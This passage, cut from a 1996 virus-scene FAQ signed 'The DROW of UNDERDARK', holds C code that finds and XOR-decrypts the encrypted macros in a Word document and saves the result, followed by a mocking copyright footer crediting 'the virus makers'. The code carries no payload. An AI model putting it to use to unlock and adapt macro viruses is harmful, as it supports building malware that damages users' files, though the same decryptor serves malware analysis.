	  if ((Buffer[Offset] == (unsigned char) Name[0]) && (stop != 1)
	      && (Offset + max <= Length))
			{
			trouve = 1;
			for (point = 1; point <= (max - 1); point++)
				 {if (Buffer[Offset + point] == (unsigned char) Name[point])
						{ trouve = trouve + 1; }
				  else trouve = 1;
				 }
			}
	  if ((trouve == max) && (stop != 1))
			{stop = 1;              /* name found: skip it, look for 'U' after it */
			 Offset += max - 1;
			 continue;
			}
	  if ((trouve == max) && (Buffer[Offset] == 0x55))
			{cledec = Buffer[Offset + 1];
			trouve = 0;
			Buffer[Offset + 1] = 0x00;
			positcle = (long) Offset;
			}
	 }
	if (cledec == 0x00)
		{printf (" Don't find the decrypted key... \n"); return 1;}
	else printf ("Decrypted Key for the macro n 1 = %x \n", cledec);

	/* 2. find the beginning of the macro: A5 C6 41, a byte, then the key */
	for (Offset = 0; Offset + 4 < Length; Offset++)
	 {
	  if (Buffer[Offset] == 0xA5)
	  {if ((Buffer[Offset + 1] == 0xC6) || (Buffer[Offset + 1] == 0xC4))
		  {if (Buffer[Offset + 2] == 0x41)
			  {if (Buffer[Offset + 4] == cledec)
					{debmac = (long) Offset + 3;
					}
			  }
		  }
	  }
	 }
	/* fallback: the key preceded by key-1 */
	if (debmac == 0x00)
		{for (Offset = 0; Offset + 1 < Length; Offset++)
			{if (Buffer[Offset] == cledec - 1)
				{if (Buffer[Offset + 1] == cledec)
					{debmac = (long) Offset; }
				}
			}
		}
	if (debmac == 0x00) { printf (" Don't find the beginning of the macro\n"); return 1;}

	/* 3. XOR each macro with its key; the next key sits 24 bytes after the previous 'U' */
	for (nbr = 1; nbr <= nbrmac; nbr++)
	{
	if (nbr != 1)
		{
		printf ("\n");
		printf (" I decrypt the macro n %ld \n", nbr);
		Offset = (unsigned long) positcle + 24;
		if ((Offset + 1 < Length) && (Buffer[Offset] == 0x55))
			{cledec = Buffer[Offset + 1];
			Buffer[Offset + 1] = 0x00;
			positcle = (long) Offset;
			printf ("Decrypted Key for the macro n %ld = %x \n", nbr, cledec);
			}
		else
			{printf (" Don't find the decrypted key ....\n");}
		}
	Offset = (unsigned long) debmac;
	point = 0;
	decfin = 1;
	stop = 1;
	printf (" I work ");
	do
	{ if (stop == 400) {printf ("."); stop = 1;}
	  Buffer[Offset + point] ^= cledec;     /* decryption by XOR */

	  /* the decoded sequence 64 1A 1B, not followed by another 64, marks
	     the end of the macro; peek at the next bytes without touching them */
	  if ((Buffer[Offset + point] == 0x64) && (Offset + point + 3 < Length)
	      && ((Buffer[Offset + point + 1] ^ cledec) == 0x1a)
	      && ((Buffer[Offset + point + 2] ^ cledec) == 0x1b)
	      && ((Buffer[Offset + point + 3] ^ cledec) != 0x64))
		{Buffer[Offset + point + 1] ^= cledec;
		 Buffer[Offset + point + 2] ^= cledec;
		 decfin = 0;
		 debmac = (long) (Offset + point + 3);   /* the next macro starts here */
		}
	  if ((Offset + point + 1) >= Length) {decfin = 0;}

	  stop = stop + 1;
	  point = point + 1;
	}
	while (decfin != 0);
	printf ("\n");
	printf (" End of decrypting the macro n %ld \n", nbr);
	}

	Output = fopen (Target, "wb");
	if (Output == NULL)
		{printf ("Can't create the output file.\n"); return 1;}
	fwrite (Buffer, 1, Length, Output);

	fclose (Output);
	fclose (Input);
	free (Buffer);
	printf ("\n"); printf ("\n");
	printf (" END ... \n");
	printf ("\n");
	printf (" The decrypted file is  %s .\n", Target);
	return 0;
}

- ------------------><--- cut here ------------------------------------


      --------------------------------------------------------------

      This FAQ is Copyright (z) 1996
    ______            _____            _____                    _____      
   /  __  \  __  __  /  __ \  _____   /  __ \    _____ ______  /  __ \  ___ _
  /  /_/  / / / / / /  / / / /  __ \ /  / /  \  / __ //  ___/ /  / / / /  // \
 /  / /  / / /_/ / /  /_/ / /  /_/ //  /_/   / / /_///  _/_  /  /_/ / /  _~  /
/__/ /__/,/_____/ /__/ \  > \_____//________/ /_//_//_____/ /  ____/ /__//__/
====*****{=========-====\/======[ The DROW of UNDERDARK ]===\_/===============
	 '


MicroFuck (tm), Windows, Word, EXCEL are Copyright (z) 1995-96 MicroFuck Corp.
	      All rights reserved to the virus makers...
       --------------------------------------------------------------

P.S : sorry but I don't use an ENGLISH version of Word, so some names of the
	instructions could be incorrect !!! Just use the F1 option and find the
	nearest name....

- ---------------------------------------------------------------------------